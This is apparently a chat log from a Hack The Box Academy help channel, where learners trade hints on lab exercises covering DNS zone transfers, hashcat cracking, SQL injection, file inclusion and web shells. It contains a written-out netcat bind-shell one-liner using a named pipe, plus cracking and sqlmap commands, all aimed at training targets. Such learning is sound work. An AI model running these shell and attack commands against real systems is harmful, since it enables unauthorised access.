Take the smallest list. If you can't find the host with it, use the next larger list. 5000 entries are too many. There are smaller lists in SecLists
take a look at the note on the support page.
You need to find another username.
I know, but I haven't found another username with any wordlist
Hi there, I am stuck in the module SQL Injection Fundamentals page Query results. My problem is that i can't connect to the given target. The Error states:
ERROR 2002 (HY000): Can't connect to MySQL server on '46.101.61.42' (115)
Any hints?
The message is vague. How do I figure out what departments are available when wordlists aren't working? And when it says "by adding your country code" is it referring to digits or letters? And does it want them prepended or appended? With a dot between the words or not? lol I just need a nudge in the right direction, short on time rn
Look at the note regarding Country Code.
Can you give a nudge for the format?
|| username.xx ||
Thank you
This is the toughest skill assessment I've faced so far
If you don't mind, can you give another hint? Once you have the two accounts, what's next? My wordlist that matches the password requirements doesn't work and changing the cookie value gave me an error message
Hi,
I've been banging my head on the footprinting DNS question about the FQDN with the last octet of x.x.x.203. I've gone through each of the dig commands in the section, I see the sub-domain but I can't find the answer, can someone put me in the right direction as I've spent about 5-6 hours researching but I can't find anything. Please help, I'm at the frustrated stage!
You need to find all the zones.
There are DNS servers that allow zone transfer (dig axfr) from anyone. But you can also configure DNS servers to allow zone transfer only from specific servers.
Then it is necessary to identify such a zone as a zone and then bruteforce it.
You can find a zone if you query a suspected zone with entries that usually occur in zones, such as www, ns, ns1, mail, mail1, etc.
That question drove me crazy. You can DM me if you still need help.
hey anyone ever had their internet drop completely while using burp in a vm? i was in the middle of the web proxies module and my internet completely dropped out. i shut down my laptop and my net came back. anyone else ever experience this?
reoccurring issue after opening burp suite in my vm.
yes
word. is it something i have to live with or is there a fix?
That seems unusual but I have heard of stranger things. Does the internet just drop on your VM or for your computer as a whole?
Is there anyone that could help me with information gathering module ? This one is kicking my ass
Where exactly are you stuck?
The fourth question (What is the FQDN of the IP address 10.10.34.136?) from Active Subdomain Enumeration
You need to find all the zones.
I tried everything I could
@west canopy I just live with it, it happens like once a week, it happens if i do nmap sometimes too, drops internet on computer as a whole. It scared me the first couple times it happened, i thought my isp could tell I was hacking and cut my internet
ok. that was my exact thought train. i was freaking out a bit.
my whole network drops off until i shut my laptop down.
it happened around 4 times until i realized it was my vm causing the issue. i always snapshot before i install new tools or update. so i was able to revert back to before it happened. everything seems to be working fine now.
What's the user for the SSH attack in the Passwords Attack module?
I ran net users and used the provided password list against all of them but none of them worked.
Try to query the subdomains you found with dig axfr
ok, thanks
Have you run Wireshark to find out why your whole network can be disrupted by your VM?
I have not. It hasn't happened since I went back to the previous snapshot. I'm gonna try again when I get back to my laptop
yes, it would be really exciting to know why this happens.
It has never happened to me until now. I hope that remains so
I feel like i may be blind or this box is wrong "Enter "THIS COMMAND" to find the version.....version shown = 7.1.3......WRONG"
"Shells & Payloads
Anatomy of A Shell i'm straight up not understanding how 7.1.3 for the version number is wrong
It shows a new release is available, but i'm not the one maintaining these boxes so really having a hard time understanding why I'm wrong?
In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer.
Reload the Academy page and then try again
still doesnt accept
@low vine Read the question carefully, it is asking for the Edition of powershell being used ๐
Hi, can someone help me with Cracking with Hashcat- Hybrid Mode? I keep getting bypassed. Here's my syntax: hashcat -a 7 -m 100 hash.txt -1=01 '?d?s' rockyou.txt
hash.txt = 978078e7845f2fb2e20399d9e80475bc1c275e06
@urban valley i got you dawg
I know this isn't the right place but im having issues
I've gotten this thing on my computer. I did an update. had an alert about win32/lodi i believed it to be from surfshark. there's been a lot of issues. well i continue to scan and find this
ok so. i looked at the file location. It was a .md file that i had created and took notes on for a reverse shell and prolly had some code in it. lol I think im safe?
I mean... how confident are you that it's a file you put there yourself? lol
Your picture has the correct answer
well it's a obsidian file i named reverse shell and entered code into it. It's been picking them all up throughout the day now
@hazy grotto You're probably fine but I would still triple check
I'm currently on this problem as well. i feel like im missing something like usual
yeah, im always a little paranoid so I will be keeping a very close eye on things
@lone comet i just got it. lol wow.
@acoustic owl
i could use you right now lol. you seem to be an expert on FQDN dns footprinting question
Which labs exactly?
lol, where do you need help?
iim going to dm you. i believe im on the right path
@woeful oxide which section is that from? I can test it on my end
hyy
i was cloning beef
its giving error
@languid fjord hyy sir sorry for ping but i am muted in general chat
module - Web request -> HTTP Methods ->GET
Could someone help me with below question. In my instance, i couldn't find the search.php?search= parameter in dev tools.
Question :The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag.
DM me
Add in academy exam certificate bug bounty
[Edited]
Nvm. After restarting the target all worked fine and i was able to get both flags
//
Hii. Do you have some tips for the first flag ?
Am actually trying to exploit the XSS vuln but i have some trouble with the API. "Something went wrong :(" when i send my vuln URL
@west rampart
Hello I have questions
ask
Cracking passwords with hashcat
Please open up a ticket.
this
Because currently I don't want to, but I clicked on PURCHASE
You can open a ticket by clicking on the chat bubble bottom right.
When?
Now.
Hello! I'm having troubles with the "CRACKING PASSWORDS WITH HASHCAT" module, "WORKING WITH RULES" submodule. I cannot crack the hash even though I feel like I have everything setup fine. the hint states, "Create a custom rule and combine it with the rockyou.txt wordlist. This exercise was created in the year 2020" which is exactly what I'm doing. Screenshot should show my attempt. Would anyone be willing to take a look and point out where I'm going wrong? Thanks!
Here's some of the info for someone to set it up:
Hash: 46244749d1e8fb99c37ad4f14fccb601ed4ae283
My rule: $2 $0 $2 $0
Your rule isn't right.
Read the question again :)
You're right! I misunderstood! Thank you! I cracked it
Hello! I'm having troubles with the **SHELLS & PAYLOADS** module, on PHP Web Shells section. I can't connect with the proxy and I don't know what I have to do, if anyone has done this section, pls help me
Another freshie?
Hello everyone, am a beginner in htb-academy. Can anyone guide me how to complete this. Tried whatever i understood from the section. But nothing is working.
Module: File Inclusion
Section: Basic Bypasses
preserve the approved path
then start traversing
I have the same problem
Did you get the approved path?
I do not quite understand what you mean...
DM me
right but which section of the module? "Identifying Hashes" right?
@jagged summit feel free to DM me
right
its supposed to work like this
and i got this
well in the second screenshot , you appear to not actually have a file called hashes.txt
Need some help with command injection skill assessment
Do we need to create a new account (to login in the HTB Academy) because I cannot login with my HTB account ?
Yes academy needs a separate account
@rustic sage sure just ping me if you still need help
@narrow wasp feel free to DM me
hey guys, is there any error on the module File Inclusion, Log Poisoning? I already got the second question, which is the flag.. but the first question just doesn't accept my answer
it ask me what's the command "uname -r" output.. i write it, and it tells me its wrong
@fast timber DM me
Is anyone able to help with the last two questions on the SMB module of Footprinting? I can't seem to get pass them
feel free to dm me
I am having an issue retrieving flag1 from Linux Local Privilege Escalation - Skills Assessment, I have flags 2 through 5 and am not sure why I cannot get flag 1. Would someone be able to point me in the right direction?
@severe birch check for hidden files/folders
I'd found information mentioning flag1 in a hidden file, but it was not located where it was referred to in that hidden file.
Hi all, can I DM anyone regarding the final assessment of file uploads? I found the uploading page, but even for requests which should be valid i always get "Only images are allowed"
@severe birch trying doing something like ls -laR from inside the htb-student directory
Somehow missed/skipped the exact file/folder I needed to look into the first 2 times.... Thanks!
@knotty hemlock DM me brother!
Hey everyone, having a little trouble on the XSS module - XSS Discovery section - last question. I've submitted the type of xss injection the server was vulnerable to but somehow not getting the answer correct
@lavish needle DM me dawg
@runic wave that should be correct
Hey all! I've been stuck on module: CRACKING PASSWORDS WITH HASHCAT, submodule: Cracking Common Hashes. I'm trying to crack the hash 7106812752615cdfe427e01b98cd4083.
I've been poking around google and I found someone saying that I'm not safe to assume this is an md5 hash. This left me confused as how to interpret the output of hashid.
Hashid gives me an output of:
<SNIP>
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
<SNIP>
Since MD2 has no hashcat mode, I went to the next which is MD5. Are all of these types equally likely meaning I should try all of them, or is there another way to look at this output?
Also, when applying built in hashcat rules I am getting some instances of 400 Billion+ combinations that will easily take 6+ hours to run. I feel like there is information that I am failing to imply at this point since going in the direction I am will seemingly take me weeks.
Would someone be willing to point me in the right direction or help talk me through what I should be implying to crack this hash?
Thank you!
@rotund mountain DM me brother!
Feel like I'm missing something here, working on the Linux Fundamentals module. The question is: "Use the systemctl command to list all units of services and submit the unit name with the description Load AppArmor profiles managed internally by snapd."
systemctl list-units --type=service |grep armor yields only one result, apparmor. When submitting apparmor or apparmor.service, both are wrong. Grepping for snapd yields no results, and profiles lists only the same apparmor service which doesn't appear to be correct. Am I missing something on my web based vm instance, something not installed correctly?
@raw bay you are super close, feel free to DM me!
@west canopy If I'm not missing anything and just need to figure it out, I'll do that, but wasn't sure. Appreciate the response, will dm if the wall starts hurting my head.
Hey guys, any hint to Password Attacks - Mutation? I got 3 valid users and after passing the supplied list of passwords to the specified rule and applying sort and removing the duplicates I got a list with the size of about 92000 entries. But if these lists are used in the hydra, all processing will take about 30h to be completed. My question is, how did the author expect the exercise to be resolved? That password list can be build in a lot of variety of pre-processing or ordering that maybe not match the middle processing time of the used list of the author. (anyway, the exercise dont give any cube. But this is a little frustrating)
@modern epoch Wish i could help brother , I haven't tried that module yet
I know for the Hydra module, typically it would crack the password very quickly . And if it ended up taking longer than a minute or two, it's because you were using the wrong wordlist or command. Not sure if that's the case with this module though.
Thanks man, no problem. Really, this module needs a review. The technique taught is not all correct, it will produce duplicate passwords. But let's see what happens here,
is there anywhere we can get a list of the changes made to updated modules?
@lost kayak You check the "Change Log" in the module Summary. It does not give specifics however (i.e., it doesn't say which sections were added or changed)
Hey everyone, I'm working through the Linux Fundamentals module and I'm stuck on the Working with Web services final question. It's asking to "start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080." I have submitted the following "php -S 127.0.0.1:8080" "php -S localhoast:8080" "php -S localhost -p 8080" and "php -S 127.0.0.1 -p 8080". I did some googling and everything seems to say that that's the way you do it. But I keep getting a message that it's wrong. (I also tried "-S 127.0.0.1:8080" etc.) Does anyone have any idea what I'm doing wrong. It seems to work on my VM.
You are correct, all of those are equally likely.
@ember crest you are super close. Try: php -S 127.0.0.1:8080
I don't believe you need to be trying such large attacks for this though, i would start with smaller stuff on each mode and build up if it fails
If i'm not mistaken, the point is to provide an example of why guessing the hash type based off purely how it looks/is formatted isn't reliable
Also i know the module is a bit out of date at this point but if you are using recent hashcat, we've added that functionality inline
thanks man! I dont really get what i did wrong but it worked! Thanks!!
@weary sand try doing: ssh user1@159.65.81.40 -p 31185
thank you :)
Only 31 hours to go!
@true owl bruh plz tell me is this website teach me from basics
@agile spire Hy bro plz guide me from where I can learn basics
Well, seems like bot got to it before me
Hi, anyone knows about the business price of hackthebox academy? How it works?
Hey guys, in "Password Attacks", section "Password Mutations" what is the format of the found flag must be used? After cracking the file the flag inside is not recognized as a valid answer.
probably u checked for spaces,tabs?
yo, quick Q: does the HTB CBBH voucher includes additional training/labs?
we have redesigned the question in that section to speed up the process, refresh the page to see the redesigned question
did anyone finish Web Service & API Attacks - Skills Assessment? I think there is a bug there, but I might be wrong
Hi! I have a question about module: 'Using Web Proxies'
There is a task:
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?
I cannot use BurpSuite so I'm using ZAP, and for some reason after writing in all the correct info in MSF, the req/res isn't captured
set PROXIES HTTP:127.0.0.1:8080 should do the trick?
thats what I did, I followed the exact manual:
$ msfconsole
msf6 > use auxiliary/scanner/http/robots_txt
msf6 auxiliary(scanner/http/robots_txt) > set PROXIES HTTP:127.0.0.1:8080
PROXIES => HTTP:127.0.0.1:8080
msf6 auxiliary(scanner/http/robots_txt) > set RHOST 142.251.36.142
RHOST => 142.251.36.142
msf6 auxiliary(scanner/http/robots_txt) > set RPORT 80
RPORT => 80
msf6 auxiliary(scanner/http/robots_txt) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
hmm I would try also with proxychains
proxychains:
http 127.0.0.1 8080
and that is working, because this command runs and shows in zap with no problem:
proxychains curl http://google.com/robots.txt -iL --cacert ~/Downloads/owasp_zap_root_ca.cer
Resolved by making a Kali VM and using Burp haha
hey ! Has anyone done the ATTACKING WEB APPLICATIONS WITH FFUF module ? I'm stuck at the filtering section and I don't understand why
@dry pumice i did it, but it was some time ago
I think my problem is with etc/hosts file
I add the domain as asked but I don't know, I got nothing when I try to run the given example command
how does Your etc/hosts look like?
if i remember correctly, You have to consider the subdomain in the hosts file
but You are asked to fuzz the subdomains, arent You?
it is something like <subdomain>.academy.htb
what is the question exactly?
I read the wrong question
Hello, can somebody help me: every time I connect to the ssh server after a few minutes the terminal freezes and I can't do anything.
Linux Fundamentals
|----> System Information
vpn drops probably
That is not the correct flag for that section...
Thanks. Well, the password I found was for the user kira initially. So, inside Documents -> Notes.zip has the flag I have used

Should I use parrot for HTB Academy or am I good using Kali?
Well, it was access got in a not intended way that tricked us.
You may use any VM you feel comfortable with, or may use pwnbox directly from your browser
i dont need the answer, i just need a nudge on the command injections assessment. i am 100% certain i found the injection point. i have tried many kinds of bypass methods, so i just want to make sure. Am i able to add a method after what is ran by the file manager script?
not method, sorry, a command.
like i know on the back end it is 100% using the "mv (original file) (new file location)"
@modest moth DM me dawg
Anyone else having trouble getting targets to spawn?
someone speaks Spanish
@twin raft speaks spanish
Hi, what's up
Hi
I speak Spanish
OK, and what's your question?
OK, so you want to get into information security and you don't know where to start?
I keep trying to learn on my own but I can't find where to learn
That's right, I want to learn
Well, this is a very good place, but it may seem a bit overwhelming at first; if you want, send a DM and I'll help you with that
Jajaja thanks man, I'll help the spanish bro
thanks and sorry, my Spanish is very bad
I don't speak any English :(
English is stupid
deepl.com helps
is there anyone who could help me with the broken auth module? section Cookie Bruteforcing
Yeah bro, what's your issue?
I'll put it into practice!
I do a lot with deepl. deepl is my friend
I'm looking for a mentor, I'm a beginner
Yea, I talked to support. There is an ongoing issue on the server side. Sit tight, they are working on it.
Thank you
yes, but deep translates better, most of the time at least.
You are in the right place, this channel is like crowdsourced mentoring
Just start in htb!
ok)
Or if u want, send dm and I'll tell you some recommendations
termux is of any use?
Can anyone provide the word list needed for the Using Web Proxies module? For the burp intruder section, the question that asks to find the .html file in the admin directory.. Ive tried the common.txt one used In that section and have had 404 on every request. I can't tell what I'm doing wrong if I don't know the list I should be using.
common.txt is the correct list...it's likely something else you're missing
Well that's good news sort of. Thank you for confirming that, I was going crazy.
@broken warren Just tested on my end, was able to get the flag using common.txt
I respawned and used the ip:port/admin/index.html as my search. Intercepted that in burp and sent it to intruder, loaded my word list, and set to runtimefile. The first request in the attack was 304 and the rest 404 shouldn't my first request be 200?
You want the payload position to look like this:
also to note, make sure you've added Payload Processing to skip the unnecessary stuff
can someone help with sql essentials flag4. I've got the --data option, but not sure about the file?
That helped get rid of my 304 status code. I had two extra headers below my connection one.
Fun mod, big whoopsie tho
How was it?
It was chill, the assessment could have been hard, but they leaked the solutions
@grand locust I think you just copy/paste the full HTTP request into a file
@livid pier intentionally or no?
lol I dont think so
It was the first super cheese I found
Kinda happy about that
Are the preceding sections yes/no questions or do you have to find flags?
A mix
Even if they arnt, they are super easy tho
Finally got the flag, much thanks to those who steered me in the right direction
It shouldnt have been a medium mod
But ya the mods with Yes/No questions are disappointing. I question if they cant make a question for us to practice the exploit how will we use that exploit IRL?
Use Burp to capture the HTTP header and create a file from it.
Then use this file in SQLMap with the flag -r
guys, for some reason i can not ssh to the host im given, neither i can do anything with it (in the Service Authentication Brute Forcing section of Login brute forcing module). It keeps saying the host is down
https://cdn.discordapp.com/attachments/695197205186871313/958447642680127528/unknown.png
https://cdn.discordapp.com/attachments/695197205186871313/958448090799538256/unknown.png
brute forcing it also takes like 40 minutes without success
An nmap -Pn scan shows the port (22) is filtered. I'm kinda stuck and really don't know what to do. Any help?
@rustic sage DM me brother
I think this is a very easy question, How do you break a command in a remote connection, without breaking your remote connection as well.
HTB Academy > Path > Breaking Into HTB > Web Requests > HTTP Methods > GET
┌─[us-academy-2]─[10.10.14.118]─[htb-ac454410@pwnbox-base]─[~]
└──╼ [★]$ curl 'http://138.68.180.98:32286/search.php?search=le' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: /' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://138.68.180.98:32286/' -H 'DNT: 1' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Connection: keep-alive' -H 'Sec-GPC: 1'
Please use cURL
┌─[us-academy-2]─[10.10.14.118]─[htb-ac454410@pwnbox-base]─[~]
└──╼ [★]$
I don't know what I'm doing wrong lol
I feel like I'm following the directions but the only response I'm getting is "please use curl" even though I obviously have the curl command in there
Try dropping out the unnecessary stuff from the command, you're pasting the entire Firefox command
for example : curl 'http://138.68.180.98:32286/search.php?search=le' -H 'Authorization: Basic YWRtaW46YWRtaW4='
also make sure you have your own authorization code, you should be able to pull it from your browser
yes, I was able to get the flag now. thanks so much
Hello, everyone. I am having problems with the Shells and Payload Module. The problem I am having trouble with is binding a Bash shell to the TCP session.
So, I got a Netcat connection, but I was unable to create a bind shell. rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
Right now, when I enter this command, it just gets repeated
@weary forum Once you enter that command , it will more or less "hang" in the terminal. But you should still be able to netcat in from your workstation:
Hi has anyone been able to do the Hybrid Mode section of Cracking Passwords With Hashcat? I'm not sure if the module is broken or something but my syntax (hashcat -a 6 -m 100 978078e7845f2fb2e20399d9e80475bc1c275e06 rockyou.txt '?d?s' ) isn't working. I've verified it with another person who completed the module but its not working on my end for some reason
anyone free to answer a question about the "HTTP Headers" Module of web requests?
@near nacelle sure
watch this space during the month of April
I don't know how much more you guys can do, it already feels like you are in overdrive
mrb3n has eye of the tiger playing on repeat literally nonstop everyday
Coffee in an IV drip
Did you manage to find a solution to that question of yesterday?
Hey guys
The LFI question?
yeh
I have not. My buddy is working on the module and he was getting the same answer as you though.
cause he also asked me about it
Anyone able to help with the last question on the DNS, footprinting module?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Yea I basically got lucky because I finished the old module, so when the new version came out the solution was already there for me
ill let you know if i make any progress
nice, thanks
Well, I checked to see if I got a netcat TCP session. I did. Unfortunately, I didn't issue that command from the htb-student workstation. I entered the command using my own IP address.
Hi everyone! Has anyone here already passed or is doing the new web services & api attacks module? I have some difficulty finding the answer for SQLi injection.
use sqlmap
Is anyone here interested in Active Directory?
I am intrigued
any news about jr. penetration tester path?
Anyone able to help with the last question on the DNS, footprinting module?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
@stark atlas you will need to run the dnsenum command, along with a wordlist , against one of the subdomains discovered earlier
damn... I have run every wordlist against the main domain and only 1 under the sub domain
will give it a go
Right, you don't want to run it against inlanefreight.htb , but one of the subdomains, i.e. xxx.inlanefreight.htb
Something a little closer to home
Found it! Thank you... only almost 2 hours trying to figure it out.
what's the issue?
Can I DM you?
Sure
Thank you to chick3nman for helping me with Cracking Passwords With Hashcat. I thought you were supposed to press "Bypass" when it showed up because I assumed Hashcat just paused or something but you're just supposed to let it run
Big time
I'm getting the same thing as you. Anyone know if that is unintentional?
ssh into the target machine
Hi, I am having trouble with the last skill assessment on the Windows Fundamentals module
Anyone around for a quick screenshare?
@snow shoal I can try and help , what's up?
I'm confused on how to get the NTFS perms set right
You free for a quick screenshare? I type fast and everything is setup already, RDP is up
sure
Appreciate you
Well, I did this. However, when I entered the command again, the only thing I got back was a repeat of what I've typed before, clearly I didn't bind the shell to the TCP connection
I can taste it. Has anyone finished yet?
I'm hot on your tail
Awesome to see this progress!
anyone have the same problem with me on module WEB SERVICE & API ATTACKS the machines are so unstable I can't finish the lab
Soon. 93%
yeah I had issues with the skill assessment also
Yes the labs did seem a bit broken. I managed to finish them but in an unintended way
Anyone planning to take cbbh?
I
Pm me
Did someone finish the Session Security module?
can anyone give some help on the information gathering web edition module? I cant seem to dig out a TXT record
Look options dig or nslookup
found it, queried the wrong zone, thanks!
I've spent the last 3 hours trying to download metasploit?
does anybody have some advice
i cant delete files on my ubuntu vm cuz theyre locked i do chmod 755 and they can be deleted
i have like 10 metasploit files
maybe the multiple locked files are interfering with each other?
i do msfconsole nothing happens
I'd consider running a Parrot OS VM. It has many of the tools you'll need installed already.
Hey guys hows it going ? Got a question why do I get the output sh: 1: /bin/bash/sh: not found. Help would be appreciated
anyone succeed on module: Web Service & API Attacks section: Skills Assessment but with sql inj not with file upload technique?
I'm stuck on this module because it wants me to use pipelist.exe but it's not installed on the machine
Anyone completed this Password Attacks easy lab? It's driving me mental!!!
Hello everyone
anyone has done the: Active Subdomain Enumeration
how did you do it
Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer
Can anybody help me in the "Hacking Wordpress" module, I've been stuck for days.
I have to find the flag.txt file in the 'directory indexing' section, and for the life of me I can't figure it out. I know I'm doing something wrong, just don't know what.
Did u reread the module ?
nslookup
@slim lagoon is right on point. Follow the section and you will find the flag.
@slim lagoon @lethal atlas I did re-read the module, and have tried curl, wpscan, and ffuf and can't find the file. Do you have to tree the directories within curl? If so, how do you do that? The curl commands they have in the module are not giving me the directory.
browse the site, look at the page source. use curl. The command they use will get you MOST of the way. you have to figure out a little on your own using the enumeration tips from the previous section.
Hi,
Can someone help me figure what i am missing on a module ? (Network Enumeration with Nmap, NSE section)
sure what are you having issues with?
Seems i've tried lots of scripts, yet i have not seen the flag. Can you confirm i am supposed to see the flag in the information returned by scripts ? (not in another that scripts will lead me to)
no, you will not see the flag returned when running nmap.
Running the scan should return the information you need to find the flag.
keep it simple, do not over think it or over complicate it. The keyword is "find" also known as enumerate, keep that in mind when picking your nmap script.
Thank you
Thanks for the reply, I did nslookup inlanefreight.htb@give ip
and didnt work
dm me
alright
All this time, it was just in front of me, thank you again
you're welcome.
anyone online that can help me with broken authentication?
@west canopy
I haven't had time to work on things lately. I'm only 75% done with bug bounty path.
You will get there, slow and steady
can i DM you?
yes
@unreal patio check C:\tools
@lethal atlas Would it be alright to DM with a question on my process?
absolutely
yes, Is there a Question?
dm if you still need help for Password Attacks easy lab
Thanks, i've completed this module
@lethal atlas Thanks bro, couldn't have figured this out without your guidance.
my pleasure

Using Web Proxies skills assessment, first question. How do I enable the /lucky.php button? I've intercepted in Burp and sent to Repeater, but I'm completely lost. I've tried changing req method as well as inspecting element on Firefox but keep coming up short
@broken warren you want to right click, inspect element, and set value='true' next to name='get flag'
After you do that you can click the button. It typically takes several attempts before it spits out the flag
LFI and File Uploads
Use any of the techniques covered in this section to gain RCE and read the flag at /
Where is a Flaf?
flag?
?
Much appreciated I was trying to change the 'disabled=""' to "disabled="false"
@quaint marsh it is the very long text file at the top. But remove the "GIF8" because that is just part of the output from your shell
Thx very much